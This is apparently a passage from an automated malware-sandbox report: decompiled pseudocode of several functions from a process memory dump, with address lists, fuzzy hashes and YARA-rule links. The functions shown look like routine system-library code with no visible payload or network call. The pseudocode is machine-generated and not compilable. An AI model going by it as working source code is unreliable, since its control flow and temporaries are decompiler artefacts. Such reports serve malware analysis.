										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                        0x02b0ef4b
                        0x02b0ef4d
                        0x02b0ef57
                        0x02b0f0bd
                        0x02b0f0c2
                        0x02b0f0d2
                        0x02b0f0d2
                        0x02b0f0c2
                        0x02b0ef5d
                        0x02b0ef5f
                        0x02b0ef67
                        0x02b0ef6a
                        0x02b0ef6d
                        0x02b0ef74
                        0x02b0ef7f
                        0x02b0ef82
                        0x02b0ef82
                        0x02b0ef86
                        0x02b0ef88
                        0x02b0ef8c
                        0x02b0ef8f
                        0x02b0ef8f
                        0x02b0ef8f
                        0x00000000
                        0x02b0ef91
                        0x02b0ef93
                        0x02b0efc4
                        0x02b0efc4
                        0x02b0efc4
                        0x02b0efca
                        0x02b0efd0
                        0x02b0f0a6
                        0x00000000
                        0x00000000
                        0x02b0f0af
                        0x02b5bb06
                        0x02b5bb0a
                        0x02b0f0b5
                        0x02b0f0b5
                        0x02b0f0b5
                        0x02b0f0b5
                        0x00000000
                        0x02b0efd6
                        0x02b0efd9
                        0x02b0f0de
                        0x02b0f0e2
                        0x02b0efdf
                        0x02b0efdf
                        0x02b0efdf
                        0x02b0efe5
                        0x02b5bafc
                        0x02b5bafc
                        0x02b0efe5
                        0x02b0efeb
                        0x02b0efed
                        0x02b0f00f
                        0x02b0f011
                        0x02b0f01a
                        0x02b0f01d
                        0x02b0f021
                        0x02b0f028
                        0x02b0f029
                        0x02b0f029
                        0x02b0f02c
                        0x00000000
                        0x02b0f02c
                        0x02b0eff3
                        0x02b0eff9
                        0x02b0f0ea
                        0x02b0f0ed
                        0x02b0f0ef
                        0x00000000
                        0x02b0f0ef
                        0x02b0f003
                        0x02b5bb12
                        0x02b0f045
                        0x02b0f049
                        0x02b0f051
                        0x02b0f09e
                        0x02b0f0a0
                        0x02b0f0a0
                        0x02b0f09e
                        0x02b0f053
                        0x02b0f064
                        0x02b0f064
                        0x02b0f06b
                        0x02b5bb1a
                        0x02b5bb1a
                        0x02b0f071
                        0x02b0f071
                        0x02b0f07d
                        0x02b0f082
                        0x02b0f08f
                        0x02b0f08f
                        0x02b0f009
                        0x02b0f00d
                        0x00000000
                        0x02b0f00d
                        0x02b0efd0
                        0x02b0ef97
                        0x02b0efa5
                        0x02b0efaa
                        0x00000000
                        0x02b0efac
                        0x02b0efac
                        0x02b0efac
                        0x00000000
                        0x02b0efb2
                        0x02b0f036
                        0x02b0f03a
                        0x02b0f040
                        0x02b0f090
                        0x00000000
                        0x02b0f092
                        0x02b0f042
                        0x00000000
                        0x02b0f042
                        0x02b0efb7
                        0x02b0efb9
                        0x02b0efbc
                        0x02b0efb0
                        0x02b0efb0
                        0x00000000
                        0x02b0efbe
                        0x02b0efbe
                        0x02b0efc1
                        0x00000000
                        0x02b0efc1
                        0x02b0efbc
                        0x02b0efaa
                        0x02b0ef91

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction ID: 49845d319deabf17d3d6c2f6a1e2bc841d9ef15da122f984eeb29db35908a636
                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction Fuzzy Hash: 0C51F030E042499FEB26CF68C1D0BAEBFB1EF15318F1881E8D855976C1DB75A989C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC740D, Relevance: .1, Instructions: 141COMMON
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E02BC740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E02B4D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E02B3F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L02B14620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L02B14620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E02B3F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L02B14620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                        0x02bc740d
                        0x02bc740d
                        0x02bc7412
                        0x02bc7413
                        0x02bc7416
                        0x02bc7418
                        0x02bc741c
                        0x02bc741f
                        0x02bc7422
                        0x02bc7422
                        0x02bc7428
                        0x02bc742a
                        0x02bc742a
                        0x02bc7451
                        0x02bc7432
                        0x02bc744f
                        0x02bc744f
                        0x00000000
                        0x02bc7434
                        0x02bc7438
                        0x02bc7443
                        0x02bc7517
                        0x02bc7517
                        0x02bc751a
                        0x02bc7535
                        0x02bc7520
                        0x02bc7527
                        0x02bc752c
                        0x02bc7531
                        0x02bc7533
                        0x00000000
                        0x02bc7533
                        0x00000000
                        0x02bc7531
                        0x02bc754b
                        0x02bc754f
                        0x02bc755c
                        0x02bc755c
                        0x02bc755f
                        0x02bc7560
                        0x02bc7561
                        0x02bc7562
                        0x02bc7563
                        0x02bc7568
                        0x02bc756a
                        0x02bc756c
                        0x02bc756d
                        0x02bc756d
                        0x02bc756f
                        0x02bc7572
                        0x02bc7574
                        0x02bc7577
                        0x02bc757c
                        0x02bc757f
                        0x00000000
                        0x02bc7551
                        0x02bc7551
                        0x02bc7551
                        0x02bc7553
                        0x02bc7553
                        0x02bc7449
                        0x02bc7449
                        0x02bc744c
                        0x02bc744c
                        0x00000000
                        0x02bc744c
                        0x02bc7443
                        0x02bc750e
                        0x02bc7514
                        0x02bc7514
                        0x02bc7455
                        0x02bc7469
                        0x02bc746d
                        0x00000000
                        0x02bc7473
                        0x02bc7473
                        0x02bc7476
                        0x02bc7480
                        0x02bc7484
                        0x02bc748e
                        0x02bc7493
                        0x02bc7493
                        0x02bc7496
                        0x02bc7499
                        0x02bc74a1
                        0x02bc74b1
                        0x02bc74b5
                        0x00000000
                        0x02bc74bb
                        0x02bc74c1
                        0x02bc74c1
                        0x02bc74c4
                        0x02bc74c5
                        0x02bc74c6
                        0x02bc74c7
                        0x02bc74c8
                        0x02bc74cd
                        0x00000000
                        0x02bc74d3
                        0x02bc74d3
                        0x02bc74d6
                        0x02bc74d8
                        0x02bc74db
                        0x02bc74dd
                        0x02bc74e0
                        0x02bc74e7
                        0x02bc74ee
                        0x02bc74ee
                        0x02bc74f4
                        0x02bc74f9
                        0x00000000
                        0x02bc74fb
                        0x02bc74fb
                        0x02bc74fd
                        0x02bc7500
                        0x02bc7503
                        0x02bc7505
                        0x02bc7505
                        0x02bc74f9
                        0x00000000
                        0x02bc74cd
                        0x02bc74b5
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction ID: 0e63e5d22dc24a4ecdcf22edd357c3761717ad79b9ca77702a6f5e75935979e6
                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction Fuzzy Hash: 93515A71600606EFCB15CF14C480A96FBB9FF45304F2981EAE9089F252E771E946DF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B22990, Relevance: .1, Instructions: 133COMMON
                        Download Yara Rule
                        C-Code - Quality: 97%
                        			E02B22990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x2bcff00);
				E02B4D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x2ad1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E02B3E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x2ad1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E02B751BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x2ad166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E02B22AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E02B06600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E02B22C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E02B0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E02B22AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E02B22C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E02B22ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E02B4D0D1(_t62);
				goto L28;
			}





















                        0x02b22990
                        0x02b22992
                        0x02b22997
                        0x02b229a3
                        0x02b229a6
                        0x02b229ab
                        0x02b229ad
                        0x02b229b2
                        0x02b65c80
                        0x02b229b8
                        0x02b229b8
                        0x02b229bb
                        0x02b229c0
                        0x02b229c5
                        0x02b229c6
                        0x02b229c6
                        0x02b229cb
                        0x00000000
                        0x00000000
                        0x02b229cd
                        0x02b229d0
                        0x02b229d9
                        0x02b229db
                        0x02b229dd
                        0x02b22a7f
                        0x02b22a84
                        0x02b22a87
                        0x02b22a89
                        0x02b65ca1
                        0x02b65ca3
                        0x00000000
                        0x02b22a8f
                        0x02b22a8f
                        0x00000000
                        0x02b22a8f
                        0x00000000
                        0x02b229e3
                        0x02b229e3
                        0x02b229e3
                        0x00000000
                        0x02b229e3
                        0x02b229dd
                        0x00000000
                        0x02b229db
                        0x02b229e6
                        0x02b229e9
                        0x02b229eb
                        0x02b229ed
                        0x02b229f3
                        0x02b229f5
                        0x02b229f8
                        0x02b229fa
                        0x02b22a97
                        0x02b22a9a
                        0x02b22a9d
                        0x02b22add
                        0x00000000
                        0x02b22a9f
                        0x02b22aa2
                        0x02b22aa5
                        0x02b22aa8
                        0x02b22aab
                        0x02b65cab
                        0x02b65caf
                        0x02b65cc5
                        0x02b65cda
                        0x02b65cdc
                        0x02b65cdf
                        0x02b65ce5
                        0x00000000
                        0x02b65ceb
                        0x02b65ced
                        0x02b65cee
                        0x00000000
                        0x02b65cee
                        0x02b65cb1
                        0x02b65cb4
                        0x02b65cb9
                        0x02b65cbb
                        0x00000000
                        0x02b65cbd
                        0x02b65cbd
                        0x00000000
                        0x02b65cbd
                        0x02b65cbb
                        0x02b22ab1
                        0x02b22ab1
                        0x02b22ac4
                        0x02b22ac6
                        0x02b22ac6
                        0x00000000
                        0x02b22ac6
                        0x02b22aab
                        0x00000000
                        0x02b22a00
                        0x02b22a09
                        0x02b22a0e
                        0x02b22a21
                        0x02b22a24
                        0x02b22a35
                        0x02b22a3a
                        0x02b22a3d
                        0x02b22a42
                        0x02b22a59
                        0x02b22a59
                        0x02b22a5c
                        0x02b22a5f
                        0x02b22a5f
                        0x02b229fa
                        0x02b229f3
                        0x02b22a64
                        0x02b22a64
                        0x02b22a6b
                        0x02b22a6b
                        0x02b22a6d
                        0x02b22a72
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c6b9ac6703b9f349e97e5cc477a55a38c6fa5cec0c5a0acca546536250211bb
                        • Instruction ID: d23ebeb1ce2cf83bf9043a88fc96d4d2ad40d53160d059d6ef0315b945e84f03
                        • Opcode Fuzzy Hash: 7c6b9ac6703b9f349e97e5cc477a55a38c6fa5cec0c5a0acca546536250211bb
                        • Instruction Fuzzy Hash: 70517C71900229DFDF25DF55C880AEEBBB6FF48314F018095EC29AB260C7359956CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B24BAD, Relevance: .1, Instructions: 131COMMON
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E02B24BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x2bed360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E02AFCC50(_t86);
					L11:
					return E02B3B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x2be8504
				E02B12280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E02B3FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E02B3B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L02B14620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E02AFCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x2be8504
								E02B0FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E02B24F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                        0x02b24bad
                        0x02b24bbf
                        0x02b24bc2
                        0x02b24bc6
                        0x02b24bcd
                        0x02b24bd9
                        0x02b667fe
                        0x02b66800
                        0x02b24ccc
                        0x02b24ccd
                        0x02b24cb7
                        0x02b24cc9
                        0x02b24cc9
                        0x02b24bdf
                        0x02b24be5
                        0x00000000
                        0x00000000
                        0x02b24beb
                        0x02b24bef
                        0x00000000
                        0x00000000
                        0x02b24bf5
                        0x02b24bf9
                        0x02b24c06
                        0x02b24c0b
                        0x02b24c17
                        0x02b24c1c
                        0x02b24c1f
                        0x02b24c25
                        0x02b24c33
                        0x02b24c3d
                        0x02b24c40
                        0x02b24c43
                        0x02b24c47
                        0x02b24c4d
                        0x02b24c53
                        0x02b24c54
                        0x02b24c55
                        0x02b24c56
                        0x02b24c5b
                        0x02b24c5c
                        0x02b24c63
                        0x02b24c6b
                        0x00000000
                        0x00000000
                        0x02b66776
                        0x02b66784
                        0x02b66784
                        0x02b6679f
                        0x02b667a7
                        0x02b667af
                        0x02b667ce
                        0x00000000
                        0x02b667b1
                        0x02b667b7
                        0x02b667b8
                        0x02b667c1
                        0x02b667d3
                        0x02b667d9
                        0x02b667dd
                        0x02b24c94
                        0x02b24c94
                        0x02b24c98
                        0x02b24c9c
                        0x02b24ca3
                        0x02b667f4
                        0x02b667f4
                        0x02b24cb5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b24cb5
                        0x02b24c79
                        0x02b24c7e
                        0x02b24c89
                        0x02b24c8b
                        0x02b24c8f
                        0x02b24c8f
                        0x00000000
                        0x02b24c89
                        0x02b667c3
                        0x00000000
                        0x02b667c3
                        0x02b667af
                        0x02b24c73
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a8b5eee82fc029e5b2652295b11d16cb67e020c5d4c7434292ca3e0430078661
                        • Instruction ID: f3bf2f792667aa85e3a8d2184c10814b2a2c4e085cca0f091e0898b7ef86e674
                        • Opcode Fuzzy Hash: a8b5eee82fc029e5b2652295b11d16cb67e020c5d4c7434292ca3e0430078661
                        • Instruction Fuzzy Hash: 1C419235A402289BCB21DF68C944BFAB7B9EF45750F0104E5E90CAB650DB78DE84CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B24D3B, Relevance: .1, Instructions: 131COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E02B24D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x2bed360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E02B3FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x2be7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E02B3B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L02B14620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E02AFCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E02B3B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E02B3F380(_t67 + 0xc, 0x2ad5138, 0x10) == 0) {
								 *0x2be60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E02B24F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E02B24E70(0x2be86b0, 0x2b25690, 0, 0) != 0) {
					_t46 = E02AFCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                        0x02b24d3b
                        0x02b24d4d
                        0x02b24d53
                        0x02b24d58
                        0x02b24d65
